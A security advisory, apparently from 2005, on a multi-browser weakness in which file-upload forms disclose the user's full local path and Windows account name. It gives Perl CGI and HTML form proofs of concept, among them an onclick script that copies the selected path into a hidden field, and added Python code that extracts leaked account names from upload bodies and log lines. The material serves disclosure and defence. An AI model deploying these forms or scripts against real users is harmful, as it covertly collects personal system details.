Multi-browser sensitive information disclosure
I. DESCRIPTION:
Mr. upken disclosed this issue publicly on 19 Feb. 2005.
Here is his advisory (in Japanese):
http://xxx.upken.jp/report/ieup/
I have a few additional details to add to his original advisory.
II. IMPACT:
Disclosure of sensitive information to an unauthorised user.
III. TECHNICAL DETAILS:
RFC 1867 is the standard that defines the "Browse..." button you use
to upload files to a web server.
It introduced the INPUT field type="file", which renders that button,
and also specified a multipart form encoding (multipart/form-data)
capable of encapsulating files for upload along with all the other
fields on the form. In that encoding the browser labels each uploaded
part with a Content-Disposition header whose filename= parameter
carries the name of the file the user selected; everything below
turns on what the browser puts into that parameter.
As Mr. upken mentions in his advisory, there is a weakness in
"Form-based File Upload in HTML".
"When we use Internet Explorer," he says, "secret or sensitive
information can be exposed by malicious people."
I have tested some examples and found that Firefox, Opera,
and Internet Explorer all have the weakness (tested on Windows XP SP2).
IV. Proof of Concept [A].
server-side Perl CGI (ask.cgi)
---------------------------
#!/usr/bin/perl
use strict;
use warnings;

# Echo back the filename= parameter the browser put in the multipart body.
print "Content-Type: text/html\n\n";
die "request too large\n" if ($ENV{CONTENT_LENGTH} || 0) > 100*1024;

my $objectname = "RFC1867";     # name of the <input type="file"> field
my $boundary = <STDIN>;         # first line of the body: "--" + MIME boundary
$boundary =~ s/\r\n//;

my $rfc1867 = "";
while (<STDIN>) {
    # Content-Disposition: form-data; name="RFC1867"; filename="C:\..."
    if (/$objectname/) {
        s/\r\n//;
        s/"//g;
        my @dum = split(/filename=/, $_);
        $rfc1867 = $dum[-1];
    }
}
$rfc1867 = Filtertxt($rfc1867);
print "$rfc1867\n";
exit(0);

# Strip characters that would let the echoed value become markup or script.
sub Filtertxt {
    my ($ft) = @_;
    $ft =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
    return $ft;
}
---------------------------
client-side FORM.
---------------------------
<form name="XA" method="POST" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload">
</form>
---------------------------
NOTE:
The method is "POST".
When we upload a file, the browser puts the file's full local path,
which includes %USERNAME%, into the filename= parameter, so the path
is disclosed to the server.
I guess that only IE has this weakness.
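The server-side step of PoC [A], and what a server actually learns from it, as an added example in Python (this is not the advisory's code and not a real capture): it parses a constructed multipart/form-data body of the kind the form above produces, pulls the filename= parameter out of the Content-Disposition header of the RFC1867 part, and reports the drive letter and account name that a full Windows path gives away. The boundary, the account name alice and the file bytes are made up. safe_basename() is the check a receiving server should apply before it logs, stores or echoes the value; modern browsers send only the leaf name in this parameter, so a full path arriving here today points to an old or unusual client.

```python
import re

# Constructed sample body (not captured traffic): what an IE of that era on
# Windows XP sends for the PoC [A] form. The filename= parameter holds the
# full local path, not just the leaf name. Boundary and account are made up.
BOUNDARY = b"---------------------------7d51a1b3d07c2"
SAMPLE_BODY = (
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="RFC1867"; '
    b'filename="C:\\Documents and Settings\\alice\\My Documents\\report.doc"\r\n'
    b"Content-Type: application/msword\r\n"
    b"\r\n"
    b"sample file bytes\r\n"
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="XB"\r\n'
    b"\r\n"
    b"HIDDEN\r\n"
    b"--" + BOUNDARY + b"--\r\n"
)

# Profile directories on Windows XP ("Documents and Settings") and on later
# versions ("Users"): the path component after them is the account name.
USER_DIR_RE = re.compile(r"(?:Documents and Settings|Users)[\\/]([^\\/]+)", re.I)
DRIVE_RE = re.compile(r"^([A-Za-z]):[\\/]")


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into parts.

    Returns a list of dicts with 'name', 'filename' (None for ordinary
    fields) and 'data'. Handles what PoC [A] needs: the RFC 2046
    delimiters and each part's Content-Disposition header.
    """
    delimiter = b"--" + boundary
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):           # this CRLF belongs to the next delimiter
            data = data[:-2]
        headers = head.decode("latin-1")
        name = re.search(r'\bname="([^"]*)"', headers)     # \b keeps "filename" out
        filename = re.search(r'filename="([^"]*)"', headers)
        parts.append({
            "name": name.group(1) if name else None,
            "filename": filename.group(1) if filename else None,
            "data": data,
        })
    return parts


def safe_basename(filename):
    """Keep only the leaf name, whichever separator the client used.

    A server should store, log or echo this, never the client-supplied path.
    """
    return re.split(r"[\\/]", filename)[-1]


def leaked_path_info(filename):
    """What a server learns from the filename= value of one upload."""
    basename = safe_basename(filename)
    user = USER_DIR_RE.search(filename)
    drive = DRIVE_RE.match(filename)
    return {
        "full_path": filename,
        "basename": basename,
        "is_full_path": filename != basename,
        "username": user.group(1) if user else None,
        "drive": drive.group(1).upper() if drive else None,
    }


def analyse_upload(body, boundary, field="RFC1867"):
    """Find the file part named `field` and report what its path discloses."""
    for part in parse_multipart(body, boundary):
        if part["name"] == field and part["filename"] is not None:
            return leaked_path_info(part["filename"])
    return None


if __name__ == "__main__":
    print(analyse_upload(SAMPLE_BODY, BOUNDARY))
```

Running the block prints the report for the constructed body: the full path, the leaf name report.doc, the drive C and the account alice. The same parser fed a body from a current browser reports is_full_path False, which is the condition a server should expect.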
V. Proof of Concept [B].
server-side Perl CGI (ask2.cgi)
---------------------------
#!/usr/bin/perl
use strict;
use warnings;

my ($buffer, %FORM);
if (($ENV{'REQUEST_METHOD'} || '') eq 'POST') {
    # read the variables sent through POST
    read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
}
else {
    # read the variables sent through GET
    $buffer = $ENV{'QUERY_STRING'};
}
$buffer = '' unless defined $buffer;

# split the variables at &
foreach my $pair (split(/&/, $buffer)) {
    # name and value of each variable
    my ($name, $value) = split(/=/, $pair, 2);
    $value = '' unless defined $value;
    # turn each + into a space
    $value =~ tr/+/ /;
    # URL-decode
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    # filter out characters that could form markup: < > " ' % ; ( ) & +
    $value = Filtertxt($value);
    # store the variable in a hash
    $FORM{$name} = $value;
}

# print the HTML
print "Content-Type: text/html\n";
print "\n";
print(($FORM{'XB'} || ''), "\n");
print "<br>\n";
print(($FORM{'RFC1867'} || ''), "\n");
exit(0);

sub Filtertxt {
    my ($ft) = @_;
    $ft =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
    return $ft;
}
---------------------------
client-side FORM.
---------------------------
<form name="XA" method="GET" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask2.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload">
</form>
---------------------------
NOTE:
The method is "GET", so the enctype is ignored and the file input's
value is sent as an ordinary query-string parameter.
When we try to upload a file, %USERNAME%, the path, etc. are disclosed.
I guess that both Opera and IE have this weakness.
V. Proof of Concept [C].
The server-side Perl CGI is the same as in Proof of Concept [B] (ask2.cgi).
client-side FORM.
---------------------------
<form name="XA" method="GET" enctype="multipart/form-data"
action="http://example.com/cgi-bin/ask2.cgi">
<input type="file" name="RFC1867">
<input type="hidden" name="XB" value="HIDDEN">
<input type=submit value="Upload"
onclick="document.XA.XB.value=document.XA.RFC1867.value;return true" >
</form>
---------------------------
NOTE:
The method is "GET".
The onclick handler copies the file input's value into the hidden
field XB, so the selected path is sent in both parameters.
When we try to upload a file, %USERNAME%, the path, etc. are disclosed.
I guess that Firefox, Opera and IE all have this weakness
when malicious JavaScript is used.
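For PoC [B] and PoC [C] the method is GET, so the browser ignores the enctype and serialises the file input's value into the query string like any other field; with PoC [C]'s onclick the hidden field XB carries the same value. The leaked path therefore lands in the request line, which is exactly what web servers write to their access logs. The following added Python example (not the advisory's code) scans request lines for query parameters that hold an absolute Windows path, drive-letter or UNC, and recovers the account name from the profile directory. The three request lines are constructed, not captured, and the account name alice is made up.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request lines (not real logs) for the PoC [B] and PoC [C]
# forms as they would appear in a server access log. The account name is
# made up.
SAMPLE_REQUESTS = [
    # PoC [B], JavaScript off: only the file input carries the path
    "GET /cgi-bin/ask2.cgi?RFC1867=C%3A%5CDocuments+and+Settings%5Calice"
    "%5CDesktop%5Cphoto.jpg&XB=HIDDEN HTTP/1.1",
    # PoC [C], JavaScript on: the hidden field XB now carries the path too
    "GET /cgi-bin/ask2.cgi?RFC1867=C%3A%5CDocuments+and+Settings%5Calice"
    "%5CDesktop%5Cphoto.jpg&XB=C%3A%5CDocuments+and+Settings%5Calice"
    "%5CDesktop%5Cphoto.jpg HTTP/1.1",
    # a request from a browser that sends only the leaf name: nothing leaks
    "GET /cgi-bin/ask2.cgi?RFC1867=photo.jpg&XB=HIDDEN HTTP/1.1",
]

# "C:\..." / "C:/..." or a UNC path "\\server\share\..."
LOCAL_PATH_RE = re.compile(r"^[A-Za-z]:[\\/]|^\\\\")
# Profile directories on Windows XP and on later versions; the component
# after them is the account name.
USER_DIR_RE = re.compile(r"(?:Documents and Settings|Users)[\\/]([^\\/]+)", re.I)


def leaked_params(request_line):
    """Return {param: path} for every query parameter holding a local path.

    parse_qs does the same '+' to space and %XX decoding that ask2.cgi does,
    so the values are what the CGI would have seen.
    """
    target = request_line.split(" ")[1]          # "GET <target> HTTP/1.1"
    query = urlsplit(target).query
    found = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if LOCAL_PATH_RE.match(value):
                found[name] = value
    return found


def leaked_usernames(request_line):
    """Account names recoverable from the leaked paths, sorted."""
    names = set()
    for path in leaked_params(request_line).values():
        match = USER_DIR_RE.search(path)
        if match:
            names.add(match.group(1))
    return sorted(names)


def scan(request_lines):
    """One (params, usernames) report per request that leaks a local path."""
    reports = []
    for line in request_lines:
        params = leaked_params(line)
        if params:
            reports.append((params, leaked_usernames(line)))
    return reports


if __name__ == "__main__":
    for params, users in scan(SAMPLE_REQUESTS):
        print(users, params)
```

Run against the constructed lines, the first two requests are reported (the second with the path in both RFC1867 and XB) and the third is silent. The same two functions can be pointed at a real access log by feeding it the request-line field of each entry.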
VI. Other browsers on other OSes.
Not tested. But...
VII. Is this a vulnerability?
I once used Internet Explorer as an FTP tool.
Today, while testing PoC [C] with Firefox, I browsed for a file to upload, found
"MyNetwork - ftp02.websamba.com - mhtmlbug - scriptkitty.jpg"
and uploaded it to another server.
Then my monitor displayed
C:\Documents and Settings\%USERNAME%\Local Settings\
Temporary Internet Files\Content.IE5\YB6J6PY3\scriptkitty[4].jpg
Oh no, YB6J6PY3!
It does not matter. I guess this is NOT a vulnerability, maybe.
VIII. Workaround
Do not upload any file to an untrusted server.
Do not attach any file (when sending webmail, posting to a mailing list, etc.).
Use Firefox with JavaScript disabled.
IX. Credit
Discovery: upken
Additional Research: bitlance winter
BEST REGARDS.
--
bitlance winter